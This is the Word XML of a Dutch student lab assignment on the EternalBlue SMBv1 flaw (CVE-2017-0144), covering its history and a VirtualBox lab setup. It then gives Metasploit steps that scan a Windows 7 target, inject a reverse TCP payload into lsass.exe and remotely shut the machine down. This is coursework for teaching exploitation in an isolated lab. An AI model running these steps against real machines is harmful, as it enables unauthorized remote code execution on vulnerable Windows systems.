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042329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8C7F56E" w14:textId="60722703" w:rsidR="000E313D" w:rsidRDefault="000E31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1F5261" wp14:editId="5EA82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1C22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5045E" wp14:editId="164F9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39FABD" w14:textId="72E5227E" w:rsidR="000E313D" w:rsidRDefault="000E3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Tom Coenen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Robin Verplancke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TIAO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E504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39FABD" w14:textId="72E5227E" w:rsidR="000E313D" w:rsidRDefault="000E31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Tom Coenen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Robin Verplancke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TIAO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8330B" wp14:editId="3C7B0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FB0DA" w14:textId="78E6C012" w:rsidR="000E313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13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Cybersecurity &amp; virtualisation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305F74" w14:textId="41F1C2B3" w:rsidR="000E313D" w:rsidRDefault="004D78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Docent: </w:t>
                                    </w:r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Pieter-Jan </w:t>
                                    </w:r>
                                    <w:proofErr w:type="spellStart"/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Maenhaut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8330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FFB0DA" w14:textId="78E6C012" w:rsidR="000E313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13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Cybersecurity &amp; virtualisation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305F74" w14:textId="41F1C2B3" w:rsidR="000E313D" w:rsidRDefault="004D78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Docent: </w:t>
                              </w:r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Pieter-Jan </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/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Maenhaut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84863" w14:textId="567A34A5" w:rsidR="000E313D" w:rsidRDefault="000E313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0F378F30" w14:textId="3535DFD2" w:rsidR="000E313D" w:rsidRPr="00A345B9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lastRenderedPageBreak/>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17788FAD" w14:textId="103C713E" w:rsidR="00F17591" w:rsidRDefault="00F17591" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">Voor de NPE opdracht van Cybersecurity &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>Virtualisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> werd gekozen voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t>CVE 2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t>17-0144</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E8212" w14:textId="19D225A1" w:rsidR="00A92FA0" w:rsidRDefault="00A92FA0" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92FA0">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>CVE-2017-0144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">, ook wel gekend onder de naam </w:t>
      </w:r>
      <w:r w:rsidRPr="00A92FA0">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft SMBv1 Remote Code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92FA0">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92FA0">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92FA0">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">, is een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F0251">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>beveiligings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F0251">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> kwetsbaarheid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> in het </w:t>
      </w:r>
      <w:r w:rsidR="006F0251">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>besturingssysteem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> van Microsoft Windows. De kwetsbaarheid bevindt zich in het Server Message Block (SMB) protocol, dat wordt gebruikt voor het delen van bestanden en printers op een netwerk.</w:t>
      </w:r>
      <w:r w:rsidR="004B4619">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B4619">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B4619">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> stelt kwaadaardige gebruikers in staat om van op afstand code uit te voeren op kwetsbare systemen zonder dat daarvoor enige vorm van authenticatie </w:t>
      </w:r>
      <w:r w:rsidR="0096248F">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">voor </w:t>
      </w:r>
      <w:r w:rsidR="004B4619">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>nodig is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64AE52" w14:textId="48629CDE" w:rsidR="006F0251" w:rsidRDefault="00155044" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">De NSA was al jaren op zoek naar potentiële kwetsbaarheden binnen Microsoft. Toen ze het SMBv1 protocol probleem ontdekten, ontwikkelde de NSA een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00250941">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">, genaamd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00250941">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00250941">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> om gebruik te maken van deze kwetsbaarheid.</w:t>
      </w:r>
      <w:r w:rsidR="00250941">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">In plaats van Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">in te lichten </w:t>
      </w:r>
      <w:r w:rsidR="00FD3408">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>over de risico’s die hun gebruikers liepen</w:t>
      </w:r>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">, gebruikte de NSA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> een half decennium lang om te helpen bij antiterrorisme- en contraspionage-operaties. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> is slechts één voorbeeld van het gebruik van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00713905" w:rsidRPr="00713905">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en achterdeurtjes in software door de NSA.</w:t>
      </w:r>
      <w:r w:rsidR="00DC6938">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Toen de NSA Microsoft eindelijk op de hoogte bracht van het bestaan ervan, was het echter al uitgelekt door een berucht hackerscollectief dat bekend staat als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC6938">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>Shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC6938">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464272FE" w14:textId="22633891" w:rsidR="00F17591" w:rsidRDefault="00687C8A" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>EternBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> kwam aan het licht vanwege zijn rol in de verspreiding van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>WannaCry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ransomeware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>-aanval in 2017, die wereldwijd systemen trof en grote schade veroorzaakte</w:t>
      </w:r>
      <w:r w:rsidR="0096248F">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:anchor=":~:text=The%20WannaCry%20ransomware%20attack%20occurred,networks%20all%20over%20the%20world" w:history="1">
        <w:r w:rsidR="0096248F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t>meer</w:t>
        </w:r>
        <w:r w:rsidR="0096248F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="0096248F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t>info</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0096248F">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001C7154">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Datzelfde jaar volgende ook de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C7154">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C7154">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> aanval, gebruik makend van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C7154">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C7154">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="001C7154">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t>meer info</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001C7154">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE5843" w14:textId="77777777" w:rsidR="001C7154" w:rsidRDefault="001C7154" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50293406" w14:textId="77777777" w:rsidR="0096248F" w:rsidRDefault="0096248F" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36249C32" w14:textId="413E8B73" w:rsidR="000E313D" w:rsidRPr="00A345B9" w:rsidRDefault="00F17591" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B66C40" w14:textId="1238F55A" w:rsidR="000E313D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lastRenderedPageBreak/>
        <w:t>Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58112BF0" w14:textId="77777777" w:rsidR="00A345B9" w:rsidRPr="00A345B9" w:rsidRDefault="00A345B9" w:rsidP="00A345B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456A9909" w14:textId="7F77205D" w:rsidR="00A345B9" w:rsidRPr="00A345B9" w:rsidRDefault="00A345B9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Installeer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A345B9">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>Virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A15074F" w14:textId="3F503FBF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Download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voor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5273D7D3" w14:textId="2DB8E9EA" w:rsidR="000E313D" w:rsidRDefault="000E313D" w:rsidP="00A345B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A345B9">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="0038723C" w:rsidRPr="0038723C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="nl-BE"/>
          </w:rPr>
          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=u8rEB6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DB1329B" w14:textId="57BB6074" w:rsidR="00A345B9" w:rsidRPr="0038723C" w:rsidRDefault="000E313D" w:rsidP="0038723C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038723C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows:</w:t>
      </w:r>
      <w:r w:rsidR="00A345B9" w:rsidRPr="0038723C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00A345B9" w:rsidRPr="0038723C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1ECBE9A6" w14:textId="7528F4D6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Plaats beide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in de folder VDI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643AA501" w14:textId="38D91279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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A345B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run het Setup.ps1 script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F58DDA" w14:textId="77777777" w:rsidR="000E313D" w:rsidRPr="000E313D" w:rsidRDefault="000E313D" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF103E7" w14:textId="64542AE4" w:rsidR="000E313D" w:rsidRDefault="000E313D" w:rsidP="000E313D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E313D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258AAF50" w14:textId="0A2011A7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 xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E313D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="547461CF" w14:textId="5FFC6920" w:rsidR="000E313D" w:rsidRPr="00CB2822" w:rsidRDefault="000E313D" w:rsidP="00A345B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB2822">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FD9228F" w14:textId="25073E2B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>Scan for vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F920E" w14:textId="04538486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auxiliary/scanner/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/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2862EF37" w14:textId="36C9C1D8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RHOSTS &lt;Windows IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767FD96F" w14:textId="69D815EB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21C569F7" w14:textId="6DD1E6E9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>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7EFF46" w14:textId="59166B33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payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13F266" w14:textId="0606A86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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24472852" w14:textId="47965DD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58E28F9B" w14:textId="096AB55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LHOST &lt;Kali IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC0188" w14:textId="388FFC31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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3782E" w14:textId="06D6D06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exploit/windows/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eternalblue_doublepulsar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58E631E9" w14:textId="4580518B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payload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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12159023" w14:textId="7A1B0C8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6047560C" w14:textId="14795A0D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TARGET 8 (Windows 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBCE134" w14:textId="382462A2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RHOSTS &lt;windows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08184F60" w14:textId="0BB51E0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LHOST &lt;kali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27A9D44B" w14:textId="01E3E056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TARGETARCHITECTURE x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942007C" w14:textId="3B0CE85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PROCESSINJECT lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34197A93" w14:textId="076B57BC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DOUBLEPULSARPATH /home/osboxes/EternalBlue/Eternalblue-Doublepulsar-Metasploit/deps/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508037F6" w14:textId="36864A7F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ETERNALBLUEPATH /home/osboxes/EternalBlue/Eternalblue-Doublepulsar-Metasploit/deps/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EFBB0C" w14:textId="251658A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WINEPATH /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB2822">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB2822">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/.wine/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB2822">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>drive_c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB2822">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E79DAA" w14:textId="70AF19C7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Run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04986897" w14:textId="2182D09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65F1168F" w14:textId="3B06A05C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lastRenderedPageBreak/>
        <w:t>Shutdown Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E28FA28" w14:textId="3627888E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shutdown /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A6B2E" w14:textId="77777777" w:rsidR="000E313D" w:rsidRPr="000E313D" w:rsidRDefault="000E313D" w:rsidP="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6D404B" w14:textId="69D903F8" w:rsidR="000E313D" w:rsidRPr="000E313D" w:rsidRDefault="000E313D" w:rsidP="000E313D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E313D">
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
        <w:t>Bijlagen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB559FB" w14:textId="77777777" w:rsidR="000E313D" w:rsidRPr="000E313D" w:rsidRDefault="000E313D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-BE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000E313D" w:rsidRPr="000E313D" w:rsidSect="000E31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B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08703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9E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B8A3B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AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA6AC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97E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BB6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5D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0576FC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33C1D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA9615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982506">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="707412596">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1698775161">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1507086936">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1858229270">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="996225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3D"/>
    <w:rsid w:val="000E313D"/>
    <w:rsid w:val="00155044"/>
    <w:rsid w:val="001C7154"/>
    <w:rsid w:val="00250941"/>
    <w:rsid w:val="0038723C"/>
    <w:rsid w:val="003C357D"/>
    <w:rsid w:val="00414F24"/>
    <w:rsid w:val="004B4619"/>
    <w:rsid w:val="004D7835"/>
    <w:rsid w:val="00687C8A"/>
    <w:rsid w:val="006F0251"/>
    <w:rsid w:val="00713905"/>
    <w:rsid w:val="008F7B62"/>
    <w:rsid w:val="0096248F"/>
    <w:rsid w:val="00A108A1"/>
    <w:rsid w:val="00A17285"/>
    <w:rsid w:val="00A345B9"/>
    <w:rsid w:val="00A92FA0"/>
    <w:rsid w:val="00AC578A"/>
    <w:rsid w:val="00CB2822"/>
    <w:rsid w:val="00DC6938"/>
    <w:rsid w:val="00E03D5E"/>
    <w:rsid w:val="00F17591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2A95"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{13DB86E1-9BB8-4333-A0FE-7D04549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E313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13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4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7-01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1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDbl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1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=u8rEB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red.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the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security/ransomware/wannacry-ransom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Tom Coenen
Robin Verplancke
TIAO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&amp; virtualisation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&amp; virtualisation</dc:title>
  <dc:subject>Docent: Pieter-Jan Maenhaut</dc:subject>
  <dc:creator>Tom Conen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Robin Verplancke</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-14T08:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-14T21:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>